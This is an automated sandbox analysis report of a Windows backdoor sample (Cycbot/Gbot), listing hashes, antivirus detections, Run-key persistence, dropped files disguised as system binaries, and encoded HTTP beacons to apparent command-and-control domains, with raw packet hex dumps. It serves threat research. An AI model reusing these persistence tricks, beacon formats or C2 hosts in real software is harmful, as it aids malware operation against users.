Analysis Date2014-06-15 03:56:06
MD5c5c9028aa80e6d97a7db2407df69c3f6
SHA169da63b2cb99ac0073029992fa41ef19dedc1804

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: cb9791f8accbf9f33e1a3e0b53ea3804 sha1: 035b996243ade44842ab18c8e2ceac5c9073fcfb size: 112640
Section.rdata md5: c7a42acfb0b02df124c7c747e2ff6da8 sha1: f6c4852b7610af26146eb97de92a90f9e0cd0fdf size: 1536
Section.data md5: 2f4ffe4093546482f4149a76d2d08a2d sha1: a8d340df1b4b8d053d2caadecb3d18f15eb0a1de size: 67072
Section.reloc md5: 0f771bb38dc2b8270485e309698a0c36 sha1: 9a4a956e48c57cb01cfe5a6cb3dd8891b03faefe size: 1024
Timestamp2005-09-26 16:58:17
PEhash9855544b9b95ca21914f973287425ef4337846e3
IMPhashae89f952fcc0ce9baaef3240a0503549
AV360 SafeGen:Variant.Kazy.38285
AVAd-AwareGen:Variant.Kazy.38285
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen8
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-409
AVDr. WebBackDoor.Gbot.69
AVEmsisoftGen:Variant.Kazy.38285
AVEset (nod32)Win32/Kryptik.SZU
AVFortinetW32/Jorik_Gbot.EBE!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Variant.Kazy.38285
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.r
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.38285
AVNormanwinpe/Kryptik.AKG
AVRisingTrojan.Win32.Generic.1299D6E1
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSresetmymemory.com
Winsock DNS127.0.0.1
Winsock DNSfastblogportal.com
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNScrazyleafdesign.com
Type: A
173.249.152.55
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.211.168
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.210.218
DNSzonedg.com
Type: A
208.73.210.215
DNSresetmymemory.com
Type: A
192.155.89.148
DNSfreshmediaportal.com
Type: A
DNSfastblogportal.com
Type: A
HTTP GEThttp://crazyleafdesign.com/blog/images/share/stumble.png?v58=98&tq=gKZEtzyTvf3qKr2%2BcOHcPVQjPP4xbMb8djC936SUeBDorAUOvT%2BsHymex2WYeZuNJ%2BXQGx55evuLap2TeFsT4m4g5tHJEA45kKYfjCRMYxecAuCYQs6bK3w0P7xM0GhJXPux02CTzN9iEYikuRQKkv1hao%2BpW1SCKV%2FQhU0XYNynPu9%2Bg7XqvWuuC9VnTUxvkl1CTlQfu4kxI47vNy1BSyFkxBdPTrnXOG2Qyv81eX9KY%2FD%2Fd%2FUY2NhLM8Ap9DdBwAsCl8hfQxk4nJ%2F26pa2Duqr%2B3l96j52wc9fVUomrOBDchWbJ4xlgeILs40TyTk%2B5hTxp93SY381gMw411Ar1kj0BKVyMcHhxXV%2BKB4r%2By9UaU1TjnvRrIjvjywkwFJnBGrPfoS4GKsqzAO1%2BWmfqSwC76tvHWRXQ38sR4sDXEx9SYhmsLMdZLz1wp0c5YJ6HxycI7wSaq0VglXuVMLTh6S
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GEThttp://resetmymemory.com/blog/images/3521.jpg?v38=90&tq=gKZEtzyMv5rJqxG1J42pzMffBvAs3OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 173.249.152.55:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.175:80
Flows TCP192.168.1.1:1038 ➝ 192.155.89.148:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f73 74756d62 6c652e70   /share/stumble.p
0x00000020 (00032)   6e673f76 35383d39 38267471 3d674b5a   ng?v58=98&tq=gKZ
0x00000030 (00048)   45747a79 54766633 714b7232 25324263   EtzyTvf3qKr2%2Bc
0x00000040 (00064)   4f486350 56516a50 50347862 4d623864   OHcPVQjPP4xbMb8d
0x00000050 (00080)   6a433933 36535565 42446f72 41554f76   jC936SUeBDorAUOv
0x00000060 (00096)   54253242 7348796d 65783257 59655a75   T%2BsHymex2WYeZu
0x00000070 (00112)   4e4a2532 42585147 78353565 76754c61   NJ%2BXQGx55evuLa
0x00000080 (00128)   70325465 46735434 6d346735 74484a45   p2TeFsT4m4g5tHJE
0x00000090 (00144)   4134356b 4b59666a 43524d59 78656341   A45kKYfjCRMYxecA
0x000000a0 (00160)   75435951 7336624b 33773050 37784d30   uCYQs6bK3w0P7xM0
0x000000b0 (00176)   47684a58 50757830 3243547a 4e396945   GhJXPux02CTzN9iE
0x000000c0 (00192)   59696b75 52514b6b 76316861 6f253242   YikuRQKkv1hao%2B
0x000000d0 (00208)   70573153 434b5625 32465168 55305859   pW1SCKV%2FQhU0XY
0x000000e0 (00224)   4e796e50 75392532 42673758 71765775   NynPu9%2Bg7XqvWu
0x000000f0 (00240)   75433956 6e545578 766b6c31 43546c51   uC9VnTUxvkl1CTlQ
0x00000100 (00256)   6675346b 78493437 764e7931 42537946   fu4kxI47vNy1BSyF
0x00000110 (00272)   6b784264 5054726e 584f4732 51797638   kxBdPTrnXOG2Qyv8
0x00000120 (00288)   31655839 4b592532 46442532 46642532   1eX9KY%2FD%2Fd%2
0x00000130 (00304)   46555932 4e684c4d 38417039 44644277   FUY2NhLM8Ap9DdBw
0x00000140 (00320)   4173436c 38686651 786b346e 4a253246   AsCl8hfQxk4nJ%2F
0x00000150 (00336)   32367061 32447571 72253242 336c3936   26pa2Duqr%2B3l96
0x00000160 (00352)   6a353277 63396656 556f6d72 4f424463   j52wc9fVUomrOBDc
0x00000170 (00368)   6857624a 34786c67 65494c73 34305479   hWbJ4xlgeILs40Ty
0x00000180 (00384)   546b2532 42356854 78703933 53593338   Tk%2B5hTxp93SY38
0x00000190 (00400)   31674d77 34313141 72316b6a 30424b56   1gMw411Ar1kj0BKV
0x000001a0 (00416)   794d6348 68785856 2532424b 42347225   yMcHhxXV%2BKB4r%
0x000001b0 (00432)   32427939 55615531 546a6e76 5272496a   2By9UaU1TjnvRrIj
0x000001c0 (00448)   766a7977 6b77464a 6e424772 50666f53   vjywkwFJnBGrPfoS
0x000001d0 (00464)   34474b73 717a414f 31253242 576d6671   4GKsqzAO1%2BWmfq
0x000001e0 (00480)   53774337 36747648 57525851 33387352   SwC76tvHWRXQ38sR
0x000001f0 (00496)   34734458 45783953 59686d73 4c4d645a   4sDXEx9SYhmsLMdZ
0x00000200 (00512)   4c7a3177 70306335 594a3648 78796349   Lz1wp0c5YJ6HxycI
0x00000210 (00528)   37775361 71305667 6c587556 4d4c5468   7wSaq0VglXuVMLTh
0x00000220 (00544)   36532048 5454502f 312e300d 0a436f6e   6S HTTP/1.0..Con
0x00000230 (00560)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000240 (00576)   486f7374 3a206372 617a796c 65616664   Host: crazyleafd
0x00000250 (00592)   65736967 6e2e636f 6d0d0a41 63636570   esign.com..Accep
0x00000260 (00608)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000270 (00624)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000280 (00640)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615325   OQij%2B8yjYvEaS%
0x000000c0 (00192)   32465425 32427371 74537225 32466525   2FT%2BsqtSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 44644277   n: close....DdBw
0x00000140 (00320)   4173436c 38686651 786b346e 4a253246   AsCl8hfQxk4nJ%2F
0x00000150 (00336)   32367061 32447571 72253242 336c3936   26pa2Duqr%2B3l96
0x00000160 (00352)   6a353277 63396656 556f6d72 4f424463   j52wc9fVUomrOBDc
0x00000170 (00368)   6857624a 34786c67 65494c73 34305479   hWbJ4xlgeILs40Ty
0x00000180 (00384)   546b2532 42356854 78703933 53593338   Tk%2B5hTxp93SY38
0x00000190 (00400)   31674d77 34313141 72316b6a 30424b56   1gMw411Ar1kj0BKV
0x000001a0 (00416)   794d6348 68785856 2532424b 42347225   yMcHhxXV%2BKB4r%
0x000001b0 (00432)   32427939 55615531 546a6e76 5272496a   2By9UaU1TjnvRrIj
0x000001c0 (00448)   766a7977 6b77464a 6e424772 50666f53   vjywkwFJnBGrPfoS
0x000001d0 (00464)   34474b73 717a414f 31253242 576d6671   4GKsqzAO1%2BWmfq
0x000001e0 (00480)   53774337 36747648 57525851 33387352   SwC76tvHWRXQ38sR
0x000001f0 (00496)   34734458 45783953 59686d73 4c4d645a   4sDXEx9SYhmsLMdZ
0x00000200 (00512)   4c7a3177 70306335 594a3648 78796349   Lz1wp0c5YJ6HxycI
0x00000210 (00528)   37775361 71305667 6c587556 4d4c5468   7wSaq0VglXuVMLTh
0x00000220 (00544)   36532048 5454502f 312e300d 0a436f6e   6S HTTP/1.0..Con
0x00000230 (00560)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000240 (00576)   486f7374 3a206372 617a796c 65616664   Host: crazyleafd
0x00000250 (00592)   65736967 6e2e636f 6d0d0a41 63636570   esign.com..Accep
0x00000260 (00608)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000270 (00624)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000280 (00640)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 79765571 25324633   OQij%2B8yvUq%2F3
0x000000c0 (00192)   766c6557 626b5925 33442048 5454502f   vleWbkY%3D HTTP/
0x000000d0 (00208)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000e0 (00224)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x000000f0 (00240)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000100 (00256)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000110 (00272)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000120 (00288)   6c6f7365 0d0a0d0a 6d672073 72633d22   lose....mg src="
0x00000130 (00304)   696e7465 726e6574 2e676966 223e0a20   internet.gif">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a367061 32447571 72253242 336c3936   .6pa2Duqr%2B3l96
0x00000160 (00352)   6a353277 63396656 556f6d72 4f424463   j52wc9fVUomrOBDc
0x00000170 (00368)   6857624a 34786c67 65494c73 34305479   hWbJ4xlgeILs40Ty
0x00000180 (00384)   546b2532 42356854 78703933 53593338   Tk%2B5hTxp93SY38
0x00000190 (00400)   31674d77 34313141 72316b6a 30424b56   1gMw411Ar1kj0BKV
0x000001a0 (00416)   794d6348 68785856 2532424b 42347225   yMcHhxXV%2BKB4r%
0x000001b0 (00432)   32427939 55615531 546a6e76 5272496a   2By9UaU1TjnvRrIj
0x000001c0 (00448)   766a7977 6b77464a 6e424772 50666f53   vjywkwFJnBGrPfoS
0x000001d0 (00464)   34474b73 717a414f 31253242 576d6671   4GKsqzAO1%2BWmfq
0x000001e0 (00480)   53774337 36747648 57525851 33387352   SwC76tvHWRXQ38sR
0x000001f0 (00496)   34734458 45783953 59686d73 4c4d645a   4sDXEx9SYhmsLMdZ
0x00000200 (00512)   4c7a3177 70306335 594a3648 78796349   Lz1wp0c5YJ6HxycI
0x00000210 (00528)   37775361 71305667 6c587556 4d4c5468   7wSaq0VglXuVMLTh
0x00000220 (00544)   36532048 5454502f 312e300d 0a436f6e   6S HTTP/1.0..Con
0x00000230 (00560)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000240 (00576)   486f7374 3a206372 617a796c 65616664   Host: crazyleafd
0x00000250 (00592)   65736967 6e2e636f 6d0d0a41 63636570   esign.com..Accep
0x00000260 (00608)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000270 (00624)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000280 (00640)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 32755976 45615325   OQij%2B82uYvEaS%
0x000000c0 (00192)   32465425 32427371 78537225 32466525   2FT%2BsqxSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 68206669   n: close....h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615350   OQij%2B8yjYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a6966 223e0a20    close....if">. 
0x00000140 (00320)   203c2f62 6f64793e 0a3c2f68 746d6c3e    </body>.</html>
0x00000150 (00336)   0a367061 32447571 72253242 336c3936   .6pa2Duqr%2B3l96
0x00000160 (00352)   6a353277 63396656 556f6d72 4f424463   j52wc9fVUomrOBDc
0x00000170 (00368)   6857624a 34786c67 65494c73 34305479   hWbJ4xlgeILs40Ty
0x00000180 (00384)   546b2532 42356854 78703933 53593338   Tk%2B5hTxp93SY38
0x00000190 (00400)   31674d77 34313141 72316b6a 30424b56   1gMw411Ar1kj0BKV
0x000001a0 (00416)   794d6348 68785856 2532424b 42347225   yMcHhxXV%2BKB4r%
0x000001b0 (00432)   32427939 55615531 546a6e76 5272496a   2By9UaU1TjnvRrIj
0x000001c0 (00448)   766a7977 6b77464a 6e424772 50666f53   vjywkwFJnBGrPfoS
0x000001d0 (00464)   34474b73 717a414f 31253242 576d6671   4GKsqzAO1%2BWmfq
0x000001e0 (00480)   53774337 36747648 57525851 33387352   SwC76tvHWRXQ38sR
0x000001f0 (00496)   34734458 45783953 59686d73 4c4d645a   4sDXEx9SYhmsLMdZ
0x00000200 (00512)   4c7a3177 70306335 594a3648 78796349   Lz1wp0c5YJ6HxycI
0x00000210 (00528)   37775361 71305667 6c587556 4d4c5468   7wSaq0VglXuVMLTh
0x00000220 (00544)   36532048 5454502f 312e300d 0a436f6e   6S HTTP/1.0..Con
0x00000230 (00560)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000240 (00576)   486f7374 3a206372 617a796c 65616664   Host: crazyleafd
0x00000250 (00592)   65736967 6e2e636f 6d0d0a41 63636570   esign.com..Accep
0x00000260 (00608)   743a202a 2f2a0d0a 55736572 2d416765   t: */*..User-Age
0x00000270 (00624)   6e743a20 6d6f7a69 6c6c612f 322e300d   nt: mozilla/2.0.
0x00000280 (00640)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
